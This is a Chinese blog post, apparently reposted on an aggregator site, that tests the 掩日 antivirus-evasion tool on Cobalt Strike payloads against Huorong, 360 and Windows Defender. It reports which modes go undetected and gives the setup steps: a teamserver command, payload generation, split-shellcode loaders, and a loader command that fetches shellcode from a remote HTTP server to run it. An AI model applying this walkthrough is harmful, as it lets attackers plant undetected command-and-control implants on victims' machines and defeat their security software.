【新版】掩日免杀windows Defender

这篇具有很好参考价值的文章主要介绍了【新版】掩日免杀windows Defender。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

更新时间:2022.05.16
【新版】掩日免杀windows Defender

本文首发乌鸦安全知识星球

1. 介绍

掩日免杀是一个非常优秀的项目,目前在4月19号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:
https://github.com/1y0n/av_evasion_tool/

【新版】掩日免杀windows Defender

下载之后本地打开:(记得关闭杀软)

【新版】掩日免杀windows Defender

2. 环境配置

安装环境:Windows10虚拟机
在这里新版本掩日采用了gcc环境和go环境,在作者的项目介绍中,对其都有要求,我们按照要求分别安装gccgo的环境:

gcc安装

gcc --version
【新版】掩日免杀windows Defender

go安装

go version
【新版】掩日免杀windows Defender

3. 环境

在作者的介绍中,针对Cobalt Strike生成的木马要求:
针对Cobalt Strike,不要选择生成Windows分阶段木马、Windows无阶段木马,而是生成payload,最终是一个payload.c文件。
因此在这里我们使用最常用的CS的木马来进行操作。

3.1 环境准备

在本地启动一个CS,服务端:
sudo ./teamserver 10.30.1.147 123

启用客户端,并新增监听,在这里使用作者建议的HTTPS方式:
【新版】掩日免杀windows Defender

然后生成一个payload.c文件:

【新版】掩日免杀windows Defender

3.2 测试环境

测试机:

  • Windows10 360主动防御
  • Windows7 火绒主动防御
  • Windows10 开启windows Defender

其中测试的杀软均升级到最新,并且关闭了自动上传样本的功能。

4. 免杀测试

4.1 通用免杀

在这里选择直接执行的方式,并且使用隐藏窗口的模式:
【新版】掩日免杀windows Defender

此时生成成功:

【新版】掩日免杀windows Defender

4.1.1 火绒(成功)

【新版】掩日免杀windows Defender
此时没有发现问题,上线测试:
【新版】掩日免杀windows Defender

4.1.2 360(成功)

关闭360的自动上传样本功能:
【新版】掩日免杀windows Defender

然后按位置扫描,没有发现问题:

【新版】掩日免杀windows Defender

上线测试下,此时上线正常:
【新版】掩日免杀windows Defender

4.1.3 Windows Defender(失败)

此时的 Windows Defender病毒库为最新版本:

【新版】掩日免杀windows Defender

静态测试

【新版】掩日免杀windows Defender

动态上线(被杀)

在上线之后,立刻被拦截查杀:
【新版】掩日免杀windows Defender

在这里可以发现,三个杀软中只有Windows Defender难过,因此针对它进一步进行测试:
在这里选择了加密方法,然后再去生成木马,但是发现过Windows Defender的时候,依旧被杀。
【新版】掩日免杀windows Defender

4.1.4 强力模式(成功)

在这里选择强力模式,作者对于强力模式的解释是拥有很好的免杀和反沙盒效果,但是耗时比较长,而且会消耗大量的CPU

【新版】掩日免杀windows Defender
【新版】掩日免杀windows Defender

此时静态查杀,依旧正常

【新版】掩日免杀windows Defender
动态上线正常:
【新版】掩日免杀windows Defender

4.2 分离免杀

在这里执行的时候,会生成两个文件,一个是不含shellcodeshellcode加载器,另外就是一个shellcode文件(可能经过了各种加密变形)。

【新版】掩日免杀windows Defender

此时生成了两个文件:
【新版】掩日免杀windows Defender
静态查杀正常:

【新版】掩日免杀windows Defender

动态加载:
动态加载的话,不是直接双击上线的,而是在命令行中,将exe加载,并且跟上分离文件的名称才可以:(此时没有杀软)

【新版】掩日免杀windows Defender

当有Windows Defender的时候:
【新版】掩日免杀windows Defender
直接被动态查杀,再试试其他的方式,发现全部被杀
【新版】掩日免杀windows Defender

4.3 网络分离

【新版】掩日免杀windows Defender
将生成的shellcode加载器放到目标机器上,并在目标机能访问到的机器上开启一个http服务:
python3 -m http.server 802
【新版】掩日免杀windows Defender
然后在远程进行加载:
dUu.exe http://10.30.1.147:802/dUu.txt
【新版】掩日免杀windows Defender
还是被Windows Defender杀了:

【新版】掩日免杀windows Defender

5. 总结

在整个掩日免杀项目中,可以看到功能比以前增加了很多,而且体验感变好,免杀能力也很强。
当然Windows Defender依旧是很难对抗的,很多情况下还是要看对方的环境是啥,不要一味地追求Bypass everyone文章来源地址https://www.toymoban.com/news/detail-472880.html

到了这里,关于【新版】掩日免杀windows Defender的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【Windows Tips】关闭 Windows Defender

    一句话,Win10 家庭版 21H2,下载 qtkite/defender-control: An open-source windows defender manager. 提供的方案。 下面是我摸索的经过…… 由于电脑在运行某些程序时,由于 Windows Defender 的防护验证流程导致异常的卡顿,便试图关闭 Windows Defender。 先是照网络上最广为流传的方法,尝试在注

    2024年02月04日
    浏览(51)
  • Windows关闭Microsoft Defender服务

    Microsoft Defender默认处于开启状态,虽然可以提供一定的病毒防护,但是它在运行时会占用很多的内存,而且大多数杀毒软件都可以替代它的功能,下面说一下关闭Microsoft Defender的方法。 温馨提醒:虽然方法一只能暂时关闭,但后面两种方法都是建立在方法一上的, 建议先按

    2024年02月11日
    浏览(51)
  • 禁用Windows Defender - Win10

    Win10自带的Windows Defender有时会造成不少麻烦,最大的问题是它不会在删除文件之前让用户进行确认,而是自行将文件删除,甚至没有运行的exe文件也会被自动删除。本文以Win10系统为例,介绍如何禁用Windows Defender。 本文的解决方案有5种,分别为方案1:临时关闭;方案2:第三

    2024年02月04日
    浏览(47)
  • 如何在 Windows 10/11 中永久关闭 Windows Defender

    本文翻译自《How to Turn Off Windows Defender in Windows 11 Permanently》 Microsoft Defender在Windows 11中是默认的反病毒/恶意软件解决方案,就像它在Windows 10中一样。它保护你的计算机免受恶意软件和病毒威胁。尽管它是目前市场上最好的防病毒解决方案之一,但你仍然可能想为测试目的或

    2024年02月03日
    浏览(59)
  • Windows Defender无法关闭的红叉

    今天手动关闭Windows Defender处理了几个风险文件,结束再次打开Windows Defender后,任务栏一直显示红叉。打开后提示“发现威胁,需要采取措施。”(如图) 诡异的是无论采取何种措施(隔离或者删除),似乎都不能生效。尽管风险文件确实已经被彻底删除了,但相关提示一直

    2024年02月20日
    浏览(38)
  • Win11永久关闭Windows Defender实时保护

    同时按下Win和R键以打开运行对话框,输入 gpedit.msc ,单击确定按钮,打开本地组策略编辑器。  在左侧窗格中依次展开计算机配置-管理模板-Windows组件-Microsoft Defender防病毒 选中 【已启用】 “关闭Microsoft Defender 防病毒” 在Microsoft Defender防病毒列表中,双击打开实时保护目录

    2024年02月11日
    浏览(128)
  • 卸载windows自带的杀毒软件Windows Defender(史上最简单的方法)

    网上关于卸载Windows Defender的方法,大多都很麻烦。。。(我试了,没成功) 什么CMD输入命令;在“运行”对话框中输入命令“gpedit.msc”。。。 进入注册表、系统组件啥的。。。。设置。。关闭。。。删除。。。 等等上面的方法看着很高级,然而不好用。。。 卸载windows自带

    2024年02月04日
    浏览(47)
  • 解决Windows Defender安全中心打开空白的两种方案

    有网友加粉丝群询问自己的 Windows 10 操作系统中的 Windows Defender 安全中心打开后出现页面空白情况,而之前自己也没有碰到过这种问题。既然问题来了,那就帮助找下解决方案,目前网络上其实也有给出一些解决方案,绝大部分是通过注册表方式来进行解决。不过有些网友表

    2024年02月10日
    浏览(41)
  • 一键卸载Windows Defender、安全中心,防止电脑杀掉自己的文件

    下载卸载文件之前需要先将电脑的 \\\"病毒和威胁防护\\\"设置中的实时保护和篡改防护两个按钮关闭  点击下面的链接下载Windows Defender的卸载文件 卸载文件分享链接 https://pan.baidu.com/s/1YvaLGDB5vkd5dRP3E4FurA?pwd=1rtd 提取码:1rtd 为了防止工具被Windows Defender拦截,下载完文件后需要先点

    2024年02月14日
    浏览(73)
  • Windows Defender存在威胁执行操作无反应且一直存在红叉(已解决)

      Windows安全中心(Windows Defender)执行快速扫描/完全扫描后一直存在威胁,执行隔离或者删除操作后下次扫描还会扫出该威胁,但看威胁文件位置发现该文件是不存在的,而且Windows Defender图标一直存在红叉无法去掉,那么该如何解决呢?本人翻阅过网上各种资料和亲自体验

    2024年01月25日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包